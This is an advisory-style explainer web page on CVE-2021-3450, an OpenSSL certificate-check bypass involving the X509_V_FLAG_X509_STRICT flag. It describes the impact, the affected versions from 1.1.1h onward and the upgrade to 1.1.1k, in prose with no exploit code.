CVE-2021-3450 : What You Need to Know
Learn about CVE-2021-3450, a vulnerability in OpenSSL allowing bypass of certificate checks with X509_V_FLAG_X509_STRICT. Find out the impact, affected versions, and mitigation steps.
A detailed guide on the security vulnerability in OpenSSL that allows bypassing the certificate check with X509_V_FLAG_X509_STRICT.
Understanding CVE-2021-3450
This section provides insights into the nature of the vulnerability and its impact.
What is CVE-2021-3450?
The CVE-2021-3450 vulnerability involves the X509_V_FLAG_X509_STRICT flag in OpenSSL, leading to a bypass in certificate checks.
The Impact of CVE-2021-3450
The vulnerability allows non-CA certificates to issue other certificates, compromising the security of certificate chains.
Technical Details of CVE-2021-3450
Here, we delve into the technical aspects of the CVE-2021-3450 vulnerability.
Vulnerability Description
The X509_V_FLAG_X509_STRICT flag implementation error in OpenSSL overwrites the check for valid CA certificates, enabling non-CA certificates to issue other certificates.
Affected Systems and Versions
OpenSSL versions 1.1.1h and newer are impacted by this vulnerability, and users are advised to upgrade to OpenSSL 1.1.1k.
Exploitation Mechanism
An application must explicitly set the X509_V_FLAG_X509_STRICT flag and either not set a purpose or override the default purpose for TLS client or server applications.
Mitigation and Prevention
This section outlines the steps to mitigate and prevent the exploitation of CVE-2021-3450.
Immediate Steps to Take
Users are recommended to upgrade to OpenSSL 1.1.1k to address the vulnerability and enhance the security of certificate chains.
Long-Term Security Practices
Maintaining up-to-date OpenSSL versions and enforcing strict certificate verification practices can help prevent similar vulnerabilities in the future.
Patching and Updates
Regularly check for security advisories and updates from OpenSSL to stay informed about patches and enhancements.